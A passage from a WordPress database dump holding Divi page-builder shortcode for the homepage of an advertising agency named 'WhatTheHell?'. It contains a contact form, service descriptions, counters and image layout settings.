button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-07 09:35:57','2020-07-07 09:35:57','',134,'https://52.66.212.87/2020/07/07/134-revision-v1/',0,'revision','',0),(273,1,'2020-07-08 20:05:59','2020-07-08 20:05:59','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image 